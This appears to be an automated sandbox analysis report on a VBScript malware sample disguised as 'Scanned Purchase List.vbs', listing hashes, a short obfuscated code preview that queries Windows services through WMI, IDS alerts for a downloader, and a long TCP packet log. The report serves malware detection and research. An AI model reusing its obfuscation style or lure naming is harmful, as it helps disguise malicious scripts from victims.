                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                Static File Info

                General

                File type:ASCII text, with very long lines (2199), with CRLF line terminators
                Entropy (8bit):5.944190963443498
                TrID:
                • Visual Basic Script (13500/0) 100.00%
                File name:Scanned Purchase List.vbs
                File size:22'301 bytes
                MD5:15b5b581555ff3e269c973f152f71cf6
                SHA1:b192825801c73167464fe4fdc71925b296379d24
                SHA256:24bddce898f1e7b3feb484483fe5bad7a29b95cdabef060ca7872d3ec3c2597f
                SHA512:83243ad7f5af9d43bca1816cf8a4ac9e7bb0d05111d68ffbc3d5dffb5fd0013b3a70d96f7f75bb8574182fb93df70bb82cb9afb22e763b15934525abdc9ed553
                SSDEEP:384:H4Z/mUNDZPI1/EslGZVYT0ta6yo48DNzOCjARM1bzRsCmc4yvIhk5SGll7:H4Z/JNDW1/q62yovNiCjA21brvigZ7
                TLSH:D2A24A894C9036EA156325F7898E3ABAE52D23F71A3051716D2EF4B40D083667CBC98F
                File Content Preview:..If sportshallers("C:\") <> vbnullstring then ....Set taeniobranchiate = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\r" + "oot\cimv2")....end if ......Set Supracranial = taeniobranchiate.ExecQuery("Select * from Win32_Service")....on error r

                File Icon

                Icon Hash:68d69b8f86ab9a86

                Network Behavior

                Suricata IDS Alerts

                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                2024-10-01T07:45:54.091474+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449737142.250.185.142443TCP
                2024-10-01T07:46:14.480901+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449746142.250.185.142443TCP
                2024-10-01T07:46:19.571212+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449747142.250.185.142443TCP
                2024-10-01T07:46:24.654203+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449748142.250.185.142443TCP
                2024-10-01T07:46:40.297941+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449754142.250.185.142443TCP
                2024-10-01T07:47:00.922546+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449759142.250.185.142443TCP
                2024-10-01T07:47:05.956043+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449760142.250.185.142443TCP

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Oct 1, 2024 07:45:39.934941053 CEST49731443192.168.2.4142.250.184.238
                Oct 1, 2024 07:45:39.934983015 CEST44349731142.250.184.238192.168.2.4
                Oct 1, 2024 07:45:39.935060024 CEST49731443192.168.2.4142.250.184.238
                Oct 1, 2024 07:45:39.945048094 CEST49731443192.168.2.4142.250.184.238
                Oct 1, 2024 07:45:39.945072889 CEST44349731142.250.184.238192.168.2.4
                Oct 1, 2024 07:45:40.779840946 CEST44349731142.250.184.238192.168.2.4
                Oct 1, 2024 07:45:40.779911995 CEST49731443192.168.2.4142.250.184.238
                Oct 1, 2024 07:45:40.780946970 CEST44349731142.250.184.238192.168.2.4
                Oct 1, 2024 07:45:40.781022072 CEST49731443192.168.2.4142.250.184.238
                Oct 1, 2024 07:45:40.785955906 CEST49731443192.168.2.4142.250.184.238
                Oct 1, 2024 07:45:40.785970926 CEST44349731142.250.184.238192.168.2.4
                Oct 1, 2024 07:45:40.786215067 CEST44349731142.250.184.238192.168.2.4
                Oct 1, 2024 07:45:40.799690008 CEST49731443192.168.2.4142.250.184.238
                Oct 1, 2024 07:45:40.843405008 CEST44349731142.250.184.238192.168.2.4
                Oct 1, 2024 07:45:41.165652037 CEST44349731142.250.184.238192.168.2.4
                Oct 1, 2024 07:45:41.166287899 CEST44349731142.250.184.238192.168.2.4
                Oct 1, 2024 07:45:41.166332960 CEST49731443192.168.2.4142.250.184.238
                Oct 1, 2024 07:45:41.169919968 CEST49731443192.168.2.4142.250.184.238
                Oct 1, 2024 07:45:41.179862976 CEST49732443192.168.2.4142.250.184.193
                Oct 1, 2024 07:45:41.179893017 CEST44349732142.250.184.193192.168.2.4
                Oct 1, 2024 07:45:41.179991961 CEST49732443192.168.2.4142.250.184.193
                Oct 1, 2024 07:45:41.180322886 CEST49732443192.168.2.4142.250.184.193
                Oct 1, 2024 07:45:41.180334091 CEST44349732142.250.184.193192.168.2.4
                Oct 1, 2024 07:45:41.828170061 CEST44349732142.250.184.193192.168.2.4
                Oct 1, 2024 07:45:41.828285933 CEST49732443192.168.2.4142.250.184.193
                Oct 1, 2024 07:45:41.831048012 CEST49732443192.168.2.4142.250.184.193
                Oct 1, 2024 07:45:41.831063032 CEST44349732142.250.184.193192.168.2.4
                Oct 1, 2024 07:45:41.831373930 CEST44349732142.250.184.193192.168.2.4
                Oct 1, 2024 07:45:41.832357883 CEST49732443192.168.2.4142.250.184.193
                Oct 1, 2024 07:45:41.879403114 CEST44349732142.250.184.193192.168.2.4
                Oct 1, 2024 07:45:42.256758928 CEST44349732142.250.184.193192.168.2.4
                Oct 1, 2024 07:45:42.256820917 CEST44349732142.250.184.193192.168.2.4
                Oct 1, 2024 07:45:42.256886005 CEST44349732142.250.184.193192.168.2.4
                Oct 1, 2024 07:45:42.256892920 CEST49732443192.168.2.4142.250.184.193
                Oct 1, 2024 07:45:42.256927967 CEST49732443192.168.2.4142.250.184.193
                Oct 1, 2024 07:45:42.262551069 CEST49732443192.168.2.4142.250.184.193
                Oct 1, 2024 07:45:46.802546024 CEST49733443192.168.2.4142.250.184.238
                Oct 1, 2024 07:45:46.802593946 CEST44349733142.250.184.238192.168.2.4
                Oct 1, 2024 07:45:46.802710056 CEST49733443192.168.2.4142.250.184.238
                Oct 1, 2024 07:45:46.802973986 CEST49733443192.168.2.4142.250.184.238
                Oct 1, 2024 07:45:46.802985907 CEST44349733142.250.184.238192.168.2.4
                Oct 1, 2024 07:45:47.432223082 CEST44349733142.250.184.238192.168.2.4
                Oct 1, 2024 07:45:47.434879065 CEST49733443192.168.2.4142.250.184.238
                Oct 1, 2024 07:45:47.434897900 CEST44349733142.250.184.238192.168.2.4
                Oct 1, 2024 07:45:47.820857048 CEST44349733142.250.184.238192.168.2.4
                Oct 1, 2024 07:45:47.822000980 CEST44349733142.250.184.238192.168.2.4
                Oct 1, 2024 07:45:47.822067022 CEST49733443192.168.2.4142.250.184.238
                Oct 1, 2024 07:45:47.822531939 CEST49733443192.168.2.4142.250.184.238
                Oct 1, 2024 07:45:47.823540926 CEST49734443192.168.2.4142.250.184.193
                Oct 1, 2024 07:45:47.823590994 CEST44349734142.250.184.193192.168.2.4
                Oct 1, 2024 07:45:47.823704958 CEST49734443192.168.2.4142.250.184.193
                Oct 1, 2024 07:45:47.823951960 CEST49734443192.168.2.4142.250.184.193
                Oct 1, 2024 07:45:47.823961020 CEST44349734142.250.184.193192.168.2.4
                Oct 1, 2024 07:45:48.470752001 CEST44349734142.250.184.193192.168.2.4
                Oct 1, 2024 07:45:48.471970081 CEST49734443192.168.2.4142.250.184.193
                Oct 1, 2024 07:45:48.471999884 CEST44349734142.250.184.193192.168.2.4
                Oct 1, 2024 07:45:48.911144972 CEST44349734142.250.184.193192.168.2.4
                Oct 1, 2024 07:45:48.911228895 CEST49734443192.168.2.4142.250.184.193
                Oct 1, 2024 07:45:48.911262035 CEST44349734142.250.184.193192.168.2.4
                Oct 1, 2024 07:45:48.911310911 CEST49734443192.168.2.4142.250.184.193
                Oct 1, 2024 07:45:48.911426067 CEST44349734142.250.184.193192.168.2.4
                Oct 1, 2024 07:45:48.911598921 CEST44349734142.250.184.193192.168.2.4
                Oct 1, 2024 07:45:48.912269115 CEST49734443192.168.2.4142.250.184.193
                Oct 1, 2024 07:45:48.919596910 CEST49734443192.168.2.4142.250.184.193
                Oct 1, 2024 07:45:52.963993073 CEST49737443192.168.2.4142.250.185.142
                Oct 1, 2024 07:45:52.964071989 CEST44349737142.250.185.142192.168.2.4
                Oct 1, 2024 07:45:52.964186907 CEST49737443192.168.2.4142.250.185.142
                Oct 1, 2024 07:45:52.964368105 CEST49737443192.168.2.4142.250.185.142
                Oct 1, 2024 07:45:52.964400053 CEST44349737142.250.185.142192.168.2.4
                Oct 1, 2024 07:45:53.593669891 CEST44349737142.250.185.142192.168.2.4
                Oct 1, 2024 07:45:53.595633984 CEST49737443192.168.2.4142.250.185.142
                Oct 1, 2024 07:45:53.595649004 CEST44349737142.250.185.142192.168.2.4
                Oct 1, 2024 07:45:54.091259956 CEST44349737142.250.185.142192.168.2.4
                Oct 1, 2024 07:45:54.091334105 CEST44349737142.250.185.142192.168.2.4
                Oct 1, 2024 07:45:54.091732979 CEST49737443192.168.2.4142.250.185.142
                Oct 1, 2024 07:45:54.091747999 CEST44349737142.250.185.142192.168.2.4
                Oct 1, 2024 07:45:54.091758013 CEST49737443192.168.2.4142.250.185.142
                Oct 1, 2024 07:45:54.091792107 CEST49737443192.168.2.4142.250.185.142
                Oct 1, 2024 07:45:54.092770100 CEST49740443192.168.2.4142.250.184.193
                Oct 1, 2024 07:45:54.092813969 CEST44349740142.250.184.193192.168.2.4
                Oct 1, 2024 07:45:54.092875957 CEST49740443192.168.2.4142.250.184.193
                Oct 1, 2024 07:45:54.093127966 CEST49740443192.168.2.4142.250.184.193
                Oct 1, 2024 07:45:54.093147039 CEST44349740142.250.184.193192.168.2.4
                Oct 1, 2024 07:45:54.101175070 CEST49740443192.168.2.4142.250.184.193
                Oct 1, 2024 07:45:54.147413015 CEST44349740142.250.184.193192.168.2.4
                Oct 1, 2024 07:45:54.730447054 CEST44349740142.250.184.193192.168.2.4
                Oct 1, 2024 07:45:54.730551004 CEST49740443192.168.2.4142.250.184.193
                Oct 1, 2024 07:45:58.134335995 CEST49743443192.168.2.4142.250.185.142
                Oct 1, 2024 07:45:58.134388924 CEST44349743142.250.185.142192.168.2.4
                Oct 1, 2024 07:45:58.134450912 CEST49743443192.168.2.4142.250.185.142
                Oct 1, 2024 07:45:58.134707928 CEST49743443192.168.2.4142.250.185.142
                Oct 1, 2024 07:45:58.134721041 CEST44349743142.250.185.142192.168.2.4
                Oct 1, 2024 07:45:58.776197910 CEST44349743142.250.185.142192.168.2.4
                Oct 1, 2024 07:45:58.783832073 CEST49743443192.168.2.4142.250.185.142
                Oct 1, 2024 07:45:58.783858061 CEST44349743142.250.185.142192.168.2.4
                Oct 1, 2024 07:45:59.180320978 CEST44349743142.250.185.142192.168.2.4
                Oct 1, 2024 07:45:59.182058096 CEST44349743142.250.185.142192.168.2.4
                Oct 1, 2024 07:45:59.182182074 CEST49743443192.168.2.4142.250.185.142
                Oct 1, 2024 07:45:59.182413101 CEST49743443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:03.188185930 CEST49744443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:03.188277960 CEST44349744142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:03.188379049 CEST49744443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:03.188687086 CEST49744443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:03.188723087 CEST44349744142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:03.837764025 CEST44349744142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:03.839281082 CEST49744443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:03.839303017 CEST44349744142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:04.232855082 CEST44349744142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:04.233712912 CEST44349744142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:04.233763933 CEST49744443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:04.234283924 CEST49744443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:08.235146999 CEST49745443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:08.235193014 CEST44349745142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:08.235265970 CEST49745443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:08.235471010 CEST49745443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:08.235480070 CEST44349745142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:08.865556955 CEST44349745142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:08.866787910 CEST49745443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:08.866805077 CEST44349745142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:09.249012947 CEST44349745142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:09.250432014 CEST44349745142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:09.250505924 CEST49745443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:09.250813007 CEST49745443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:13.250509024 CEST49746443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:13.250567913 CEST44349746142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:13.250698090 CEST49746443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:13.250943899 CEST49746443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:13.250956059 CEST44349746142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:13.884335995 CEST44349746142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:13.885637999 CEST49746443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:13.885658979 CEST44349746142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:14.480946064 CEST44349746142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:14.481020927 CEST44349746142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:14.481170893 CEST49746443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:14.481600046 CEST49746443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:18.523298025 CEST49747443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:18.523355007 CEST44349747142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:18.523426056 CEST49747443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:18.523673058 CEST49747443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:18.523690939 CEST44349747142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:19.169967890 CEST44349747142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:19.171226978 CEST49747443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:19.171256065 CEST44349747142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:19.571249962 CEST44349747142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:19.572448969 CEST44349747142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:19.572571993 CEST49747443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:19.572860956 CEST49747443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:23.594597101 CEST49748443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:23.594659090 CEST44349748142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:23.594727039 CEST49748443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:23.595063925 CEST49748443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:23.595073938 CEST44349748142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:24.254071951 CEST44349748142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:24.255356073 CEST49748443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:24.255378962 CEST44349748142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:24.654205084 CEST44349748142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:24.654666901 CEST49748443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:24.654716969 CEST44349748142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:24.654772043 CEST49748443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:24.655431986 CEST49749443192.168.2.4142.250.184.193
                Oct 1, 2024 07:46:24.655472994 CEST44349749142.250.184.193192.168.2.4
                Oct 1, 2024 07:46:24.655539036 CEST49749443192.168.2.4142.250.184.193
                Oct 1, 2024 07:46:24.655752897 CEST49749443192.168.2.4142.250.184.193
                Oct 1, 2024 07:46:24.655762911 CEST44349749142.250.184.193192.168.2.4
                Oct 1, 2024 07:46:24.663979053 CEST49749443192.168.2.4142.250.184.193
                Oct 1, 2024 07:46:24.711395025 CEST44349749142.250.184.193192.168.2.4
                Oct 1, 2024 07:46:25.283421993 CEST44349749142.250.184.193192.168.2.4
                Oct 1, 2024 07:46:25.283512115 CEST49749443192.168.2.4142.250.184.193
                Oct 1, 2024 07:46:25.283560991 CEST49749443192.168.2.4142.250.184.193
                Oct 1, 2024 07:46:28.672255993 CEST49750443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:28.672310114 CEST44349750142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:28.672377110 CEST49750443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:28.672641039 CEST49750443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:28.672652960 CEST44349750142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:29.298243999 CEST44349750142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:29.298315048 CEST49750443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:29.298995018 CEST44349750142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:29.299052954 CEST49750443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:29.302666903 CEST49750443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:29.302680016 CEST44349750142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:29.302912951 CEST44349750142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:29.303854942 CEST49750443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:29.347404957 CEST44349750142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:29.721427917 CEST44349750142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:29.721506119 CEST44349750142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:29.721595049 CEST49750443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:29.722498894 CEST49750443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:29.723493099 CEST49751443192.168.2.4142.250.184.193
                Oct 1, 2024 07:46:29.723546028 CEST44349751142.250.184.193192.168.2.4
                Oct 1, 2024 07:46:29.723628998 CEST49751443192.168.2.4142.250.184.193
                Oct 1, 2024 07:46:29.793129921 CEST49751443192.168.2.4142.250.184.193
                Oct 1, 2024 07:46:29.793227911 CEST44349751142.250.184.193192.168.2.4
                Oct 1, 2024 07:46:29.793303967 CEST49751443192.168.2.4142.250.184.193
                Oct 1, 2024 07:46:34.000576973 CEST49753443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:34.000623941 CEST44349753142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:34.000725031 CEST49753443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:34.000960112 CEST49753443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:34.000977039 CEST44349753142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:34.750227928 CEST44349753142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:34.751394033 CEST49753443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:34.751418114 CEST44349753142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:35.161227942 CEST44349753142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:35.161303997 CEST44349753142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:35.161356926 CEST49753443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:35.161732912 CEST49753443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:39.172322035 CEST49754443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:39.172415972 CEST44349754142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:39.172513962 CEST49754443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:39.172730923 CEST49754443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:39.172761917 CEST44349754142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:39.819818974 CEST44349754142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:39.821122885 CEST49754443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:39.821141958 CEST44349754142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:40.297714949 CEST44349754142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:40.297791004 CEST44349754142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:40.297849894 CEST49754443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:40.298235893 CEST49754443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:44.297480106 CEST49755443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:44.297540903 CEST44349755142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:44.297626972 CEST49755443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:44.297883034 CEST49755443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:44.297903061 CEST44349755142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:44.955710888 CEST44349755142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:44.957124949 CEST49755443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:44.957160950 CEST44349755142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:45.360275984 CEST44349755142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:45.360344887 CEST44349755142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:45.360400915 CEST49755443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:45.360759020 CEST49755443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:49.360424995 CEST49756443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:49.360496044 CEST44349756142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:49.360611916 CEST49756443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:49.360856056 CEST49756443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:49.360867977 CEST44349756142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:49.994260073 CEST44349756142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:49.995774031 CEST49756443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:49.995820999 CEST44349756142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:50.810659885 CEST44349756142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:50.810761929 CEST44349756142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:50.810815096 CEST49756443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:50.811256886 CEST49756443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:54.813374043 CEST49757443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:54.813431978 CEST44349757142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:54.813574076 CEST49757443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:54.813858032 CEST49757443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:54.813877106 CEST44349757142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:55.461891890 CEST44349757142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:55.463813066 CEST49757443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:55.463848114 CEST44349757142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:55.855707884 CEST44349757142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:55.856528997 CEST44349757142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:55.856578112 CEST49757443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:55.856962919 CEST49757443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:55.858891010 CEST49758443192.168.2.4142.250.184.193
                Oct 1, 2024 07:46:55.858961105 CEST44349758142.250.184.193192.168.2.4
                Oct 1, 2024 07:46:55.859028101 CEST49758443192.168.2.4142.250.184.193
                Oct 1, 2024 07:46:59.860503912 CEST49759443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:59.860552073 CEST44349759142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:59.860734940 CEST49759443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:59.867728949 CEST49759443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:59.867744923 CEST44349759142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:00.525399923 CEST44349759142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:00.526706934 CEST49759443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:00.526738882 CEST44349759142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:00.922502995 CEST44349759142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:00.922933102 CEST49759443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:00.923001051 CEST44349759142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:00.923043966 CEST44349759142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:00.923049927 CEST49759443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:00.923084974 CEST49759443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:04.938021898 CEST49760443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:04.938077927 CEST44349760142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:04.938170910 CEST49760443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:04.938400030 CEST49760443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:04.938410044 CEST44349760142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:05.565171957 CEST44349760142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:05.566939116 CEST49760443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:05.566982985 CEST44349760142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:05.955993891 CEST44349760142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:05.956909895 CEST44349760142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:05.956984997 CEST49760443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:05.957287073 CEST49760443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:09.955671072 CEST49761443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:09.955717087 CEST44349761142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:09.955837011 CEST49761443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:09.956187963 CEST49761443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:09.956198931 CEST44349761142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:10.649738073 CEST44349761142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:10.651026964 CEST49761443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:10.651043892 CEST44349761142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:11.032294989 CEST44349761142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:11.033653975 CEST44349761142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:11.033850908 CEST49761443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:11.034430027 CEST49761443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:15.049834013 CEST49762443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:15.049880981 CEST44349762142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:15.053935051 CEST49762443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:15.057818890 CEST49762443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:15.057835102 CEST44349762142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:15.689404011 CEST44349762142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:15.691019058 CEST49762443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:15.691035032 CEST44349762142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:16.068867922 CEST44349762142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:16.069704056 CEST44349762142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:16.069766045 CEST49762443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:16.077105045 CEST49762443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:16.086492062 CEST49763443192.168.2.4142.250.184.193
                Oct 1, 2024 07:47:16.086534977 CEST44349763142.250.184.193192.168.2.4
                Oct 1, 2024 07:47:16.086597919 CEST49763443192.168.2.4142.250.184.193
                Oct 1, 2024 07:47:16.086987019 CEST49763443192.168.2.4142.250.184.193
                Oct 1, 2024 07:47:16.086997032 CEST44349763142.250.184.193192.168.2.4
                Oct 1, 2024 07:47:16.090229034 CEST49763443192.168.2.4142.250.184.193
                Oct 1, 2024 07:47:16.131398916 CEST44349763142.250.184.193192.168.2.4
                Oct 1, 2024 07:47:16.774764061 CEST44349763142.250.184.193192.168.2.4
                Oct 1, 2024 07:47:16.774861097 CEST49763443192.168.2.4142.250.184.193
                Oct 1, 2024 07:47:16.774861097 CEST49763443192.168.2.4142.250.184.193
                Oct 1, 2024 07:47:20.142673969 CEST49764443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:20.142738104 CEST44349764142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:20.142811060 CEST49764443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:20.143132925 CEST49764443192.168.2.4142.250.185.142
